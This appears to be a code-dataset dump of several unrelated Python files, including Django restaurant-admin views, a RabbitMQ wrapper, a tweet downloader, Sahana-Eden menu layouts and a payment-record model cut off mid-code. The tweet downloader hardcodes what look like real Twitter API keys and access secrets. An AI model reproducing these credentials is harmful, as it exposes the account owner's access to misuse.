forms.InputForm\n model = models.Food\n fields='__all__'\n'''\n\n\n@method_decorator(login_required, name='dispatch')\nclass FoodHomeDetailView(View):\n template_name = 'restaurant_admin/FoodHomedetail.html'\n #form_class = forms.InputForm\n model = models.Food\n fields='__all__'\n chosen_object=None\n update_form=None\n queryset= models.Food.objects.all()\n\n def get(self,*args,**kwargs):\n self.queryset=self.model.objects.all()\n return render(self.request, 'restaurant_admin/FoodHomedetail.html',context={'object_list':self.queryset,\n 'chosen_object': self.chosen_object,\n 'update_form': self.update_form})\n def post(self,*args,**kwargs):\n postvalues = self.request.POST\n\n if postvalues.get('food_id', None):\n id = self.request.POST.get('food_id')\n self.chosen_object= self.model.objects.get(pk=id)\n #print(self.chosen_object.name)\n\n if self.chosen_object != None:\n self.update_form=forms.FoodForm(instance=self.chosen_object)\n\n if postvalues.get('edit',None):\n self.chosen_object=self.model.objects.get(pk=postvalues['pk'])\n self.update_form=forms.FoodForm(self.request.POST,instance=self.chosen_object)\n if self.update_form.is_valid():\n food=self.update_form.save()\n food.save()\n self.queryset= models.Food.objects.all()\n self.chosen_object=self.model.objects.get(pk=food.pk)\n self.update_form=forms.FoodForm(instance=self.chosen_object)\n\n return render(self.request,'restaurant_admin/FoodHomedetail.html',context={'object_list':self.queryset,\n 'chosen_object': self.chosen_object,\n 'update_form': self.update_form})\n\n@method_decorator(login_required, name='dispatch')\nclass FoodDeleteView(DeleteView):\n template_name = 'restaurant_admin/Fooddelete.html'\n model = models.Food\n fields = '__all__'\n\n def get(self, *args, **kwargs):\n return self.post(*args, **kwargs)\n\n def get_success_url(self):\n return reverse('restaurant_admin:FoodHome_detail')\n\n@method_decorator(login_required, name='dispatch')\nclass FoodListView(ListView):\n template_name = 'restaurant_admin/Foodlist.html'\n model = models.Food\n fields = '__all__'\n\n\n@method_decorator(login_required, name='dispatch')\nclass WorkerCreateView(CreateView):\n template_name = 'restaurant_admin/Workercreate.html'\n model = models.Worker\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass WorkerUpdateView(UpdateView):\n template_name = 'restaurant_admin/Workerupdate.html'\n model = models.Worker\n fields = '__all__'\n\n\n@method_decorator(login_required, name='dispatch')\nclass WorkerDetailView(DetailView):\n template_name = 'restaurant_admin/Workerdetail.html'\n model = models.Worker\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass WorkerHomeDetailView(View):\n template_name = 'restaurant_admin/WorkerHomedetail.html'\n #form_class = forms.InputForm\n model = models.Worker\n fields='__all__'\n chosen_object=None\n update_form=None\n queryset= models.Worker.objects.all()\n\n def get(self,*args,**kwargs):\n self.queryset=self.model.objects.all()\n return render(self.request, 'restaurant_admin/WorkerHomedetail.html',context={'object_list':self.queryset,\n 'chosen_object': self.chosen_object,\n 'update_form': self.update_form})\n def post(self,*args,**kwargs):\n postvalues = self.request.POST\n\n if postvalues.get('worker_id', None):\n id = self.request.POST.get('worker_id')\n self.chosen_object= self.model.objects.get(pk=id)\n #print(self.chosen_object.name)\n\n if self.chosen_object != None:\n self.update_form=forms.WorkerForm(instance=self.chosen_object)\n\n if postvalues.get('edit',None):\n self.chosen_object=self.model.objects.get(pk=postvalues['pk'])\n self.update_form=forms.WorkerForm(self.request.POST,instance=self.chosen_object)\n if self.update_form.is_valid():\n worker=self.update_form.save()\n worker.save()\n self.queryset= models.Worker.objects.all()\n self.chosen_object=self.model.objects.get(pk=worker.pk)\n self.update_form=forms.WorkerForm(instance=self.chosen_object)\n\n return render(self.request,'restaurant_admin/WorkerHomedetail.html',context={'object_list':self.queryset,\n 'chosen_object': self.chosen_object,\n 'update_form': self.update_form})\n\n@method_decorator(login_required, name='dispatch')\nclass WorkerDeleteView(DeleteView):\n #template_name = 'restaurant_admin/Workerdelete.html'\n model = models.Worker\n fields = '__all__'\n\n def get(self, *args, **kwargs):\n return self.post(*args, **kwargs)\n\n def get_success_url(self):\n return reverse('restaurant_admin:WorkerHome_detail')\n\n@method_decorator(login_required, name='dispatch')\nclass WorkerListView(ListView):\n template_name = 'restaurant_admin/Workerlist.html'\n model = models.Worker\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass TableCreateView(CreateView):\n template_name = 'restaurant_admin/Tablecreate.html'\n model = models.Table\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass TableDetailView(DetailView):\n template_name = 'restaurant_admin/Tabledetail.html'\n model = models.Table\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass TableHomeDetailView(FormView, ListView):\n template_name = 'restaurant_admin/TableHomedetail.html'\n form_class = forms.InputForm\n model = models.Table\n fields='__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass TableDeleteView(DeleteView):\n #template_name = 'restaurant_admin/Tabledelete.html'\n model = models.Table\n fields = '__all__'\n\n def get(self, *args, **kwargs):\n return self.post(*args, **kwargs)\n\n def get_success_url(self):\n return reverse('restaurant_admin:TableHome_detail')\n\n\n@method_decorator(login_required, name='dispatch')\nclass TableListView(ListView):\n template_name = 'restaurant_admin/Tablelist.html'\n model = models.Table\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass CostCreateView(CreateView):\n template_name = 'restaurant_admin/Costcreate.html'\n model = models.Cost\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass CostUpdateView(UpdateView):\n template_name = 'restaurant_admin/Costupdate.html'\n model = models.Cost\n fields = '__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass CostDetailView(DetailView):\n template_name = 'restaurant_admin/Costdetail.html'\n model = models.Cost\n fields = '__all__'\n\n\n@method_decorator(login_required, name='dispatch')\nclass CostHomeDetailView(FormView, ListView):\n template_name = 'restaurant_admin/CostHomedetail.html'\n form_class = forms.InputForm\n model = models.Cost\n fields='__all__'\n\n@method_decorator(login_required, name='dispatch')\nclass CostDeleteView(DeleteView):\n template_name = 'restaurant_admin/Costdelete.html'\n model = models.Cost\n fields = '__all__'\n\n def get_success_url(self):\n return reverse('restaurant_admin:CostHome_detail')\n\n@method_decorator(login_required, name='dispatch')\nclass CostListView(ListView):\n template_name = 'restaurant_admin/Costlist.html'\n model = models.Cost\n fields = '__all__'\n","sub_path":"restaurant_admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"593499739","text":"from typing import Any, Dict, Iterable, Optional, Tuple\n\nfrom datastore.shared.util import DeletedModelsBehaviour\n\nfrom ....models.checker import Checker, CheckException\nfrom ....models.models import Organization\nfrom ....shared.exceptions import ActionException\nfrom ....shared.filters import FilterOperator\nfrom ....shared.interfaces.event import EventType\nfrom ....shared.interfaces.write_request import WriteRequest\nfrom ....shared.patterns import Collection, FullQualifiedId\nfrom ....shared.util import INITIAL_DATA_FILE, get_initial_data_file\nfrom ...action import Action\nfrom ...mixins.singular_action_mixin import SingularActionMixin\nfrom ...util.default_schema import DefaultSchema\nfrom ...util.register import register_action\nfrom ...util.typing import ActionData, ActionResults\n\n\n@register_action(\"organization.initial_import\", internal=True)\nclass OrganizationInitialImport(SingularActionMixin, Action):\n \"\"\"\n Action to import an initial-data.json in an empty datastore.\n Should be callable from the management service.\n \"\"\"\n\n model = Organization()\n schema = DefaultSchema(Organization()).get_default_schema(\n additional_required_fields={\"data\": {\"type\": \"object\"}},\n title=\"Import initial data.\",\n description=\"Import an initial data json in an empty datastore.\",\n )\n\n def perform(\n self, action_data: ActionData, user_id: int, internal: bool = False\n ) -> Tuple[Optional[WriteRequest], Optional[ActionResults]]:\n \"\"\"\n Simplified entrypoint to perform the action.\n \"\"\"\n self.user_id = user_id\n self.index = 0\n instance = next(iter(action_data))\n self.validate_instance(instance)\n instance = self.update_instance(instance)\n self.write_requests.extend(self.create_write_requests(instance))\n final_write_request = self.process_write_requests()\n return (final_write_request, [None])\n\n def update_instance(self, instance: Dict[str, Any]) -> Dict[str, Any]:\n data = instance[\"data\"]\n\n self.check_empty_datastore()\n\n if not data:\n data = get_initial_data_file(INITIAL_DATA_FILE)\n instance[\"data\"] = data\n\n # check datavalidation\n checker = Checker(data=data, mode=\"all\")\n try:\n checker.run_check()\n except CheckException as ce:\n raise ActionException(str(ce))\n\n return instance\n\n def check_empty_datastore(self) -> None:\n filter_ = FilterOperator(\"id\", \">=\", 1)\n if self.datastore.exists(\n Collection(\"organization\"),\n filter_,\n DeletedModelsBehaviour.ALL_MODELS,\n False,\n ):\n raise ActionException(\"Datastore is not empty.\")\n\n def create_write_requests(self, instance: Dict[str, Any]) -> Iterable[WriteRequest]:\n json_data = instance[\"data\"]\n write_requests = []\n for collection in json_data:\n for entry in json_data[collection].values():\n fqid = FullQualifiedId(Collection(collection), entry[\"id\"])\n write_requests.append(\n self.build_write_request(\n EventType.Create,\n fqid,\n \"initial import\",\n entry,\n )\n )\n return write_requests\n","sub_path":"openslides_backend/action/actions/organization/initial_import.py","file_name":"initial_import.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"63387928","text":"\"\"\"Module holding implementation of message brokers.\"\"\"\nimport logging\nimport os\nfrom abc import ABC, abstractmethod\n\nfrom collections.abc import Callable\nimport pika\n\n\nclass MessageBroker(ABC):\n \"\"\"Abstract implementation of a message broker.\"\"\"\n @abstractmethod\n def _setup(self):\n \"\"\"Abstract function which sets up the message broker.\"\"\"\n\n @abstractmethod\n def setup_callback(self, callback_function: Callable) -> None:\n \"\"\"Abstract function which sets up the callback.\"\"\"\n\n @abstractmethod\n def publish(self, body: bytes) -> None:\n \"\"\"Abstract function which publish a body to the message broker.\"\"\"\n\n @abstractmethod\n def start_consuming(self) -> None:\n \"\"\"Abstract function which starts the consumption of messages queued.\"\"\"\n\n\nclass RabbitMQ(MessageBroker):\n \"\"\"Implementation of a message broker using RabbitMQ\"\"\"\n def __init__(self, service: str='rabbitmq', publish_queue: str=None, consume_queue: str=None) -> None:\n self._host = os.environ.get(\"RABBITMQ_HOST\", \"localhost\")\n self._port = os.environ.get(\"RABBITMQ_PORT\", 5672)\n self._user = os.environ.get(\"RABBITMQ_USER\", \"guest\")\n self._pwd = os.environ.get(\"RABBITMQ_PWD\", \"guest\")\n self._publish_queue = publish_queue\n self._consume_queue = consume_queue\n self._logger = logging.getLogger(service)\n self._channel = self._setup()\n\n # pylint: disable=invalid-name\n def _setup(self) -> pika.channel.Channel:\n \"\"\"Sets up a channel to RabbitMQ Message Broker\"\"\"\n while True:\n try:\n connection = pika.BlockingConnection(\n pika.ConnectionParameters(\n host=self._host,\n port=self._port,\n credentials=pika.PlainCredentials(\n self._user,\n self._pwd\n )\n )\n )\n channel = connection.channel()\n if self._publish_queue:\n channel.queue_declare(queue=self._publish_queue)\n if self._consume_queue:\n channel.queue_declare(queue=self._consume_queue)\n return channel\n except pika.exceptions.ProbableAuthenticationError as e:\n self._logger.error(\"Error while authenticating on RabbitMQ\")\n raise e\n except pika.exceptions.AuthenticationError as e:\n self._logger.error(\"Error while authenticating on RabbitMQ\")\n raise e\n except pika.exceptions.ConnectionClosedByBroker as e:\n self._logger.error(\"Connection was closed unexpectedly\")\n raise e\n except Exception as e: # pylint: disable=broad-except\n self._logger.error(\"Unexpected error on RabbitMQ: %s\", e)\n raise e\n\n def setup_callback(self, callback_function: Callable) -> None:\n self._channel.basic_consume(\n queue=self._consume_queue,\n on_message_callback=callback_function,\n auto_ack=False\n )\n\n def publish(self, body: bytes) -> None:\n self._channel.basic_publish(\n exchange='',\n routing_key=self._publish_queue,\n body=body\n )\n\n def start_consuming(self) -> None:\n self._channel.start_consuming()\n","sub_path":"common/common/message_broker.py","file_name":"message_broker.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"255999050","text":"def hej(imie):\n\t\n\tif imie == 'Ola':\n\t\tprint('Hej Alealeksandro!')\n\telif imie == 'Karo':\n\t\tprint('Hej Karcia!')\n\telse:\n\t\tprint('Hej'+' '+imie+ '!')\ndziewczyny = ['Rachel', 'Monica', 'Phoebe', 'Ola', 'Ty']\nfor imie in dziewczyny:\n\thej(imie)\n\tprint('Kolejna dziewczyna')\nfor i in range(1, 6):\n print(i)","sub_path":"własne_funkcje.py","file_name":"własne_funkcje.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"20350765","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Aug 8 19:14:08 2020\r\n\r\n@author: z\r\n\"\"\"\r\n\r\n\r\ndef majorityElement(nums):\r\n \r\n \"\"\"\r\n calculates the element that occurs the most often\r\n in the list nums\r\n \"\"\"\r\n\r\n nums.sort()\r\n i = 0\r\n ans = [0,0]\r\n while i < len(nums):\r\n a = nums.count(nums[i])\r\n if a > ans[1]:\r\n ans[0] = nums[i]\r\n ans[1] = a\r\n i += a\r\n else:\r\n i += a\r\n return ans[0]","sub_path":"Duplicate numbers.py","file_name":"Duplicate numbers.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"46283575","text":"#!/usr/bin/env python\r\n# encoding: utf-8\r\n\r\nimport tweepy #https://github.com/tweepy/tweepy\r\nimport csv\r\nimport sqlite3\r\n\r\n#Twitter API credentials\r\nconsumer_key = \"FFjHNuDcapXxwlTvE1kCAsZMw\"\r\nconsumer_secret = \"SYSXcHtWDNkqsbWLHf6UV51QFGsPK245CqgThZ310tp00UwPvt\"\r\naccess_key = \"3084274719-eMn9OZzBHQoxh2c0hJKiNxo7EfZcgsdNfVOTcC8\"\r\naccess_secret = \"c7nUCfyNlTSI2WqlwcUQnNp4Bkwfz5IhTHRTvAI5nK6a9\"\r\n\r\ndef to_db(screen_name):\r\n\tf=open('%s_tweets.csv' % screen_name,'r') \r\n\tnext(f, None) \r\n\treader = csv.reader(f)\r\n\r\n\tsql = sqlite3.connect('\\\\db.sqlite3\\fyp_project_tweets')\r\n\tcur = sql.cursor()\r\n\r\n\tcur.execute('''CREATE TABLE IF NOT EXISTS fyp_project_Tweets\r\n (date datetime, message char)''') \r\n\t\t\t \r\n\tfor row in reader:\r\n\t\tcur.execute(\"INSERT INTO fyp_project_Tweets VALUES (? ,? )\", row)\r\n\t\r\n\tf.close()\r\n\tsql.commit()\r\n\tsql.close()\r\n\r\n\r\ndef get_all_tweets(screen_name):\r\n\t#Twitter only allows access to a users most recent 3240 tweets\r\n\t\r\n\t#authorize twitter, initialize tweepy\r\n\tauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n\tauth.set_access_token(access_key, access_secret)\r\n\tapi = tweepy.API(auth)\r\n\t\r\n\t#initialize a list to hold all the tweepy Tweets\r\n\talltweets = []\t\r\n\t\r\n\t#make initial request for most recent tweets (200 is the maximum allowed count)\r\n\tnew_tweets = api.user_timeline(screen_name = screen_name, count=200, include_rts=False)\r\n\t#new_tweets = api.user_timeline(screen_name = screen_name,count=340, include_rts=False)\r\n\t\r\n\t#save most recent tweets\r\n\talltweets.extend(new_tweets)\r\n\t\r\n\t#save the id of the oldest tweet less one\r\n\toldest = alltweets[-1].id - 1\r\n\t\r\n\t#keep grabbing tweets until there are no tweets left to grab\r\n\twhile len(new_tweets) > 0:\r\n\t\tprint (\"getting tweets before %s\" % (oldest));\r\n\t\t\r\n\t\t#all subsiquent requests use the max_id param to prevent duplicates\r\n\t\tnew_tweets = api.user_timeline(screen_name = screen_name,count=200, max_id=oldest)\r\n\t\t#new_tweets = api.user_timeline(screen_name = screen_name,count=340,max_id=oldest,tweet_mode = 'extended')\r\n\t\t\r\n\t\t#save most recent tweets\r\n\t\talltweets.extend(new_tweets)\r\n\t\t\r\n\t\t#update the id of the oldest tweet less one\r\n\t\toldest = alltweets[-1].id - 1\r\n\t\t\r\n\t\tprint (\"%s tweets downloaded\" % (len(alltweets)));\r\n\t\r\n\t#transform the tweepy tweets into a 2D array that will populate the csv\t\r\n\t#outtweets = [[tweet.id_str, tweet.created_at, tweet.full_text.encode(\"utf-8\").replace('\\n', ' ').replace('\\r', '')] for tweet in alltweets]\r\n\touttweets = [[tweet.text.encode(\"utf-8\")] for tweet in alltweets]\r\n\t\r\n\t#write the csv\t\r\n\twith open('%s_tweets.csv' % screen_name, 'w') as f:\r\n\t\twriter = csv.writer(f)\r\n\t\twriter.writerow([\"text\"])\r\n\t\twriter.writerows(outtweets)\r\n\t\r\n\tpass\r\n\r\n\r\nif __name__ == '__main__':\r\n\t#pass in the username of the account you want to download\r\n\tget_all_tweets(\"MrShen_\")\r\n\t#to_db(\"afbucker\")","sub_path":"tweetloader.py","file_name":"tweetloader.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278956913","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Sahana-Eden GUI Layouts (HTML Renderers)\n\n @copyright: 2012 (c) Sahana Software Foundation\n @license: MIT\n\n Permission is hereby granted, free of charge, to any person\n obtaining a copy of this software and associated documentation\n files (the \"Software\"), to deal in the Software without\n restriction, including without limitation the rights to use,\n copy, modify, merge, publish, distribute, sublicense, and/or sell\n copies of the Software, and to permit persons to whom the\n Software is furnished to do so, subject to the following\n conditions:\n\n The above copyright notice and this permission notice shall be\n included in all copies or substantial portions of the Software.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES\n OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\n WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n OTHER DEALINGS IN THE SOFTWARE.\n\n @status: work in progress\n @todo: - complete layout implementations\n - render \"selected\" (flag in item)\n - remove S3Menu\n\"\"\"\n\n__all__ = [\"S3LanguageMenuLayout\", \"ML\",\n \"S3PersonalMenuLayout\", \"MP\",\n \"S3MainMenuLayout\", \"MM\",\n \"S3OptionsMenuLayout\", \"M\",\n \"S3MenuSeparatorLayout\", \"SEP\",\n \"S3BreadcrumbsLayout\",\n \"homepage\"]\n\nfrom gluon import *\nfrom gluon.storage import Storage\nfrom ..s3 import *\n\n# =============================================================================\n\nclass S3MainMenuLayout(S3NavigationItem):\n \"\"\" Application Main Menu Layout \"\"\"\n\n @staticmethod\n def layout(item):\n\n if item.parent is None:\n # The main menu\n items = item.render_components()\n return UL(items, _id=\"nav\")\n else:\n if item.components:\n # A submenu\n items = item.render_components()\n _class = item.selected and \"highlight\" or \"\"\n return LI(A(item.label, _href=item.url(), _class=_class),\n UL(items, _class=\"sub-menu\"))\n else:\n # A menu item\n if item.enabled and item.authorized:\n return LI(A(item.label, _href=item.url()))\n else:\n return None\n\n# -----------------------------------------------------------------------------\n# Shortcut\nMM = S3MainMenuLayout\n\n# =============================================================================\n\nclass S3OptionsMenuLayout(S3NavigationItem):\n \"\"\" Controller Options Menu Layout \"\"\"\n\n @staticmethod\n def layout(item):\n\n if item.parent is None:\n # The menu itself\n items = item.render_components()\n return UL(items, _id=\"main-sub-menu\", _class=\"sub-menu\")\n else:\n if item.enabled and item.authorized:\n if item.components:\n _class = \"\"\n if item.parent.parent is None and item.selected:\n _class = \"highlight\"\n items = item.render_components()\n if items:\n items = LI(UL(items, _class=\"menu-extention\"))\n return [LI(A(item.label, _href=item.url(), _class=_class)), items]\n else:\n if item.parent.parent is None:\n _class = item.selected and \"highlight\" or \"\"\n else:\n _class = \" \"\n return LI(A(item.label, _href=item.url(), _class=_class))\n\n# -----------------------------------------------------------------------------\n# Shortcut\nM = S3OptionsMenuLayout\n\n# =========================================================================\n\nclass S3MenuSeparatorLayout(S3NavigationItem):\n \"\"\" Simple menu separator \"\"\"\n\n @staticmethod\n def layout(item):\n\n if item.parent is not None:\n return LI(HR(), _class=\"menu_separator\")\n else:\n return None\n\n# -----------------------------------------------------------------------------\n# Shortcut\nSEP = S3MenuSeparatorLayout\n\n# =========================================================================\n\nclass S3BreadcrumbsLayout(S3NavigationItem):\n \"\"\" Breadcrumbs layout \"\"\"\n\n @staticmethod\n def layout(item):\n\n if item.parent is None:\n items = item.render_components()\n return DIV(UL(items), _class='breadcrumbs')\n else:\n if item.is_last():\n _class = \"highlight\"\n else:\n _class = \"ancestor\"\n return LI(A(item.label, _href=item.url(), _class=_class))\n\n# =========================================================================\ndef homepage(module=None, *match, **attr):\n \"\"\"\n Shortcut for module homepage menu items using the MM layout,\n retrieves the module's nice name.\n\n @param module: the module's prefix (controller)\n @param match: additional prefixes\n @param attr: attributes for the navigation item\n \"\"\"\n\n settings = current.deployment_settings\n all_modules = settings.modules\n\n layout = S3MainMenuLayout\n\n if module is None:\n module = \"default\"\n if module in all_modules:\n m = all_modules[module]\n c = [module] + list(match)\n return layout(m.name_nice, c=c, f=\"index\", **attr)\n return None\n\n# =============================================================================\nclass S3Menu(DIV):\n \"\"\"\n MENU implementation -\n * breadcrumbs support\n * greater control / flexibility\n\n @author Abhishek Mishra\n @author Fran Boon\n\n @deprecated: retained here for reference\n \"\"\"\n\n # -------------------------------------------------------------------------\n def __init__(self, data, **args):\n self.data = data\n self.attributes = args\n\n # -------------------------------------------------------------------------\n def serialize(self, data, level=0):\n \"\"\"\n NOTE on right:\n personal-menu is the one on top right besides login,\n a presence of right in module level menu indicates a personal-menu\n\n nav is the big menu below the logo,\n an absence of right in module level menu indicates nav items\n\n main-sub-menu is the left side menu\n a right = True indicates a highlight here (set by 01_menu)\n\n extension are submenus under main-sub-menu\n a right = True indicates highlight here (set by 01_menu)\n \"\"\"\n _type = self.attributes[\"_type\"]\n if _type == \"personal-menu\":\n items = []\n data = [x for x in data if x[1]]\n for item in data:\n (name, link) = item[:2]\n items.append(LI(A(name,\n _href=link)\n )\n )\n\n deployment_settings = current.deployment_settings\n if deployment_settings.get_L10n_display_toolbar():\n menu_langs = self.attributes[\"_menu_langs\"]\n current_lang = current.T.accepted_language\n langopts = [ OPTION(x[0], _value=x[2]) for x in menu_langs[3] ]\n langselect = SELECT(langopts,\n _name=\"_language\",\n _title=\"Language Selection\",\n value=current_lang,\n _onchange=\"$('#personal-menu div form').submit();\"\n )\n langform = FORM(langselect,\n _name=\"_language\",\n _action=\"\",\n _method=\"get\")\n return DIV([UL(items), langform], _class=\"pmenu-wrapper\")\n else:\n return DIV(UL(items))\n elif _type == \"nav\":\n _highlight = \"\" or self.attributes[\"_highlight\"]\n items = []\n for item in data:\n (name, right, link) = item[:3]\n if not right:\n import re\n _link = link\n if \"default\" not in _highlight:\n _highlight = re.match(\"(.*/).*$\", _highlight).group(1)\n _link = re.match(\"(.*/).*$\", link).group(1)\n _class = \"highlight\" if str(_link) in _highlight else \" \"\n items.append(LI(\n A(name, _href=link, _class=_class)\n ))\n return UL(items, **self.attributes)\n elif _type == \"main-sub-menu\":\n items = []\n for item in data:\n (name, right, link) = item[:3]\n if link:\n # Lack of link => lack of permissions\n items.append(LI(A(name,\n _href=link,\n _class=\"highlight\" if right==True else \" \")\n )\n )\n if len(item) > 3:\n sub = item[3]\n append = S3Menu(sub,\n _type=\"extension\",\n _class=\"menu-extention\").serialize(sub)\n items.append(append)\n return UL(items, **self.attributes)\n elif _type == \"extension\":\n items = []\n for item in data:\n (name, right, link) = item[:3]\n if link:\n # Lack of link => lack of permissions\n items.append(LI(A(\"%s\" % name,\n _href=link,\n _class=\"highlight\" if right==True else \" \")\n )\n )\n return UL(items, **self.attributes)\n else:\n return UL()\n\n # -------------------------------------------------------------------------\n def xml(self):\n return self.serialize(self.data, 0).xml()\n\n# =============================================================================\n\nclass S3LanguageMenuLayout(S3NavigationItem):\n\n @staticmethod\n def layout(item):\n \"\"\" Language menu layout\n\n options for each entry:\n - lang_code: the language code\n - lang_name: the language name\n option for the menu\n - current_language: code of the current language\n \"\"\"\n\n if item.enabled:\n if item.components:\n # The language menu itself\n current_language = item.options.get(\"current_language\", None)\n items = item.render_components()\n select = SELECT(items, value=current_language,\n _name=\"_language\",\n _title=\"Language Selection\",\n _onchange=\"$('#personal-menu div form').submit();\")\n form = FORM(select, _name=\"_language\",\n _action=\"\",\n _method=\"get\")\n return form\n else:\n # A language entry\n return OPTION(item.option.lang_code,\n item.option.lang_name)\n else:\n return None\n\n # -------------------------------------------------------------------------\n def check_enabled(self):\n \"\"\" Check whether the language menu is enabled \"\"\"\n\n settings = current.deployment_settings\n\n if settings.get_L10n_display_toolbar():\n return True\n else:\n return False\n\n# -----------------------------------------------------------------------------\n# Shortcut\nML = S3LanguageMenuLayout\n\n# =============================================================================\n\nclass S3PersonalMenuLayout(S3NavigationItem):\n\n @staticmethod\n def layout(item):\n\n if item.parent is None:\n # The menu\n items = item.render_components()\n if items:\n return DIV(UL(items), _class=\"pmenu-wrapper\")\n else:\n return \"\" # menu is empty\n else:\n # A menu item\n if item.enabled and item.authorized:\n return LI(A(item.label, _href=item.url()))\n else:\n return None\n\n# -----------------------------------------------------------------------------\n# Shortcut\nMP = S3PersonalMenuLayout\n\n# END =========================================================================\n","sub_path":"modules/eden/layouts.py","file_name":"layouts.py","file_ext":"py","file_size_in_byte":13094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"426154522","text":"import textwrap\nimport codecs\n\n\ndef force_text(maybe_bytes):\n if isinstance(maybe_bytes, bytes):\n return codecs.decode(maybe_bytes, 'utf8')\n return maybe_bytes\n\n\nDEFAULT_MESSAGE = \"An error occured during execution\"\n\n\nclass SolcError(Exception):\n message = \"An error occurred during execution\"\n\n def __init__(self, command, return_code, stdout_data, stderr_data, message=None):\n if message is not None:\n self.message = message\n self.command = command\n self.return_code = return_code\n self.stderr_data = force_text(stderr_data)\n self.stdout_data = force_text(stdout_data)\n\n def __str__(self):\n return textwrap.dedent((\"\"\"\n {s.message}\n > command: `{command}`\n > return code: `{s.return_code}`\n > stderr:\n {s.stdout_data}\n > stdout:\n {s.stderr_data}\n \"\"\").format(\n s=self,\n command=' '.join(self.command),\n )).strip()\n\n\nclass ContractsNotFound(SolcError):\n message = \"No contracts found during compilation\"\n","sub_path":"solc/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"75206778","text":"'''\nfor sorting in main function\n'''\ndef take_second(elem):\n return elem[1]\n\n'''\nmain function\n'''\nT = int(input())\nfor test_case in range(1, T + 1):\n n = int(input()) \n\n # n개의 경우에 대해 s, e 저장\n se = []\n for i in range(1, n+1):\n s, e = map(int, input().split())\n se.append([s, e])\n \n #sorting se; key: e, ascending order\n se = sorted(se, key = take_second)\n\n sum = 0 # 도크 쓸 수 있는 총 횟수\n temp = se[0][1]\n sum += 1\n for i in range(1, n):\n if se[i][0] >= temp:\n temp = se[i][1]\n sum += 1\n \n print('#%d %d' %(test_case, sum))","sub_path":"swexpert_PS/3 greedy alg/3-2.py","file_name":"3-2.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"596608310","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields\nfrom collections import OrderedDict\n\nimport hashlib\nimport urllib\nimport execjs\n\n\nclass HisLongPayRecord(models.Model):\n\n _name = 'his.long_pay_record'\n _description = u'龙支付记录'\n\n POSID = fields.Char('商户柜台代码')\n BRANCHID = fields.Char('分行代码')\n ORDERID = fields.Char('定单号')\n PAYMENT = fields.Char('付款金额')\n CURCODE = fields.Char('币种')\n REMARK1 = fields.Char('备注一')\n REMARK2 = fields.Char('备注二')\n ACC_TYPE = fields.Char('账户类型')\n SUCCESS = fields.Char('成功标志')\n TYPE = fields.Char('接口类型')\n REFERER = fields.Char('Referer信息')\n CLIENTIP = fields.Char('客户端IP')\n ACCDATE = fields.Char('系统记账日期')\n USRMSG = fields.Char('支付账户信息')\n INSTALLNUM = fields.Char('分期期数')\n ERRMSG = fields.Char('错误信息')\n USRINFO = fields.Char('客户加密信息')\n DISCOUNT = fields.Char('优惠金额')\n SIGN = fields.Char('数字签名')\n\n is_refund = fields.Boolean('是否退款')\n refund_time = fields.Datetime('退款时间')\n refund_code = fields.Char('退款状态码')\n refund_msg = fields.Char('退款返回信息')\n\n order_ids = fields.Many2many('sale.order', 'long_pay_record_order_rel', 'record_id', 'order_id', '订单')\n\n company_id = fields.Many2one('res.company', '医院')\n internal_id = fields.Integer('内部ID')\n\n def get_pay_parameter(self, company, orders):\n \"\"\"获取支付参数\"\"\"\n def md5_encode(str):\n m = hashlib.md5()\n m.update(str)\n return m.hexdigest()\n\n if not orders:\n return\n\n amount_total = round(sum([order.amount_total for order in orders]), 2) # 订单总额\n attach = '|'.join([order.name for order in orders]) # 附加数据包\n pub = company.long_key[-30:]\n\n\n reginfo = '测试注册信息'\n proinfo = orders[0].order_line[0].product_id.name if orders[0].order_line else '未知'\n\n reginfo = execjs.eval(\"\"\"escape('%s')\"\"\" % reginfo)\n proinfo = execjs.eval(\"\"\"escape('%s')\"\"\" % proinfo)\n\n # 'MERCHANTID': company.long_mch_id, # 商户代码\n # 'POSID': company.long_counter_id, # 商户柜台代码\n # 'BRANCHID': company.long_branch_code, # 分行代码\n # 'ORDERID': 